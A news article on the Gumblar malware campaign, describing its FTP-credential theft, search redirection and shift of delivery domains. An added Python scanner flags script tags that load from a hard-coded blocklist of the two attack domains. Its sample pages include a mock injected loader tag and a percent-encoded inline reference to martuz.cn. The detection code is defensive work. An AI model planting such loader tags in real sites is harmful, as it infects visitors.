“Gumblar” web attack spreading fast
A dangerous attack compromising websites is on the prowl. It’s known as “Gumblar”.
A complex new malware attack is setting infection records and raising alarms from security experts.
Known unofficially as ‘Gumblar’ for one of the attack domains, the malware is raising eyebrows and alert levels both for its prolific attack methods and for the danger of its payload.
So how does it work in general terms?
What’s the cause for concern?
The attack was first detected in late March, and researchers thought it had been halted by mid-April when Google delisted the offending sites.
However, a new variant on the attack arose early this month and has since enjoyed nearly unprecedented success. Security firm ScanSafe estimates that Gumblar attacks have jumped some 188 per cent over the last week alone, and Sophos credits Gumblar with up to 42 per cent of all malware infections in the last seven days.
“The gross infection rate is exceptional, especially this late in the game,” said Mary Landesman, senior security researcher at ScanSafe.
“Basically, it has been enjoying free rein.”
Why the concern regarding the malware payload?
The malware intercepts web traffic such as Google search requests and redirects it to present fraudulent results, allowing the attackers to collect referral fees and placing the user at risk of further infection.
The malware contains botnet controllers and is programmed to harvest the FTP credentials found on infected systems, allowing Gumblar to infect any site that the user administers and further fostering the spread to new domains.
To make matters worse for security administrators, the creators have altered the script and are launching it from a new domain.
Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks’ malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.
“They have slightly modified the script and now inject a new version that loads malicious content from a new domain,” Unmask Parasites said in the advisory.
Changes to the script make it harder to identify and help it evade detection by the Google Chrome browser, Unmask Parasites said.
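Site owners can check their own pages for the injected loader described above. The following scanner is an added example, not code from the article or from Unmask Parasites: it parses an HTML document, pulls out every external script source and inline script body, and flags any that reference the two delivery domains the article names (gumblar.cn and martuz.cn). The sample pages, the script paths, and the percent-encoded inline variant are constructed for the example; a real deployment would feed the scanner a maintained blocklist rather than a hard-coded set.

```python
"""Scan HTML for script tags that load from known Gumblar delivery domains."""
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Delivery domains named in the article. Assumption: a production scanner
# would load a maintained blocklist instead of this fixed set.
KNOWN_BAD_DOMAINS = {"gumblar.cn", "martuz.cn"}


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src="...">
        self.inline = []     # text of <script>...</script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _host_matches(host, bad_domains):
    """True if host equals a listed domain or is a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def scan_html(html, bad_domains=KNOWN_BAD_DOMAINS):
    """Return a list of (kind, evidence) findings for the given HTML text."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        # A default scheme lets protocol-relative "//host/x" URLs resolve too.
        host = urlparse(src, scheme="http").hostname
        if _host_matches(host, bad_domains):
            findings.append(("external_script", src))
    for body in parser.inline:
        # Decode %xx escapes so a percent-encoded domain name is still seen.
        decoded = unquote(body).lower()
        for d in sorted(bad_domains):
            if d in decoded:
                findings.append(("inline_script_references_domain", d))
                break
    return findings


# Constructed sample pages (not real infected content): a benign page, the
# same page with an injected loader tag (path is made up), and an inline
# script that hides the domain behind percent-encoding.
CLEAN_PAGE = """<html><head><title>Example</title>
<script src="/js/app.js"></script></head><body><p>hello</p></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="http://martuz.cn/example.js"></script></head>')

ENCODED_INLINE_PAGE = """<html><body>
<script>var u = unescape("%6d%61%72%74%75%7a%2e%63%6e/x");</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE),
                       ("encoded", ENCODED_INLINE_PAGE)]:
        print(name, scan_html(page))
```

Running the module over a site's HTML files and alerting on any non-empty result gives a cheap, offline check that complements the browser-side blocking the article mentions; matching on the hostname rather than on a substring of the whole page avoids false positives from news articles that merely mention the domains in text.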
It spreads in typical fashion, by exploiting vulnerabilities.
The scripts attempt to exploit vulnerabilities in Adobe’s Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.
In other words, to avoid being infected by this malware, keep your systems updated so that these vulnerabilities cannot be exploited.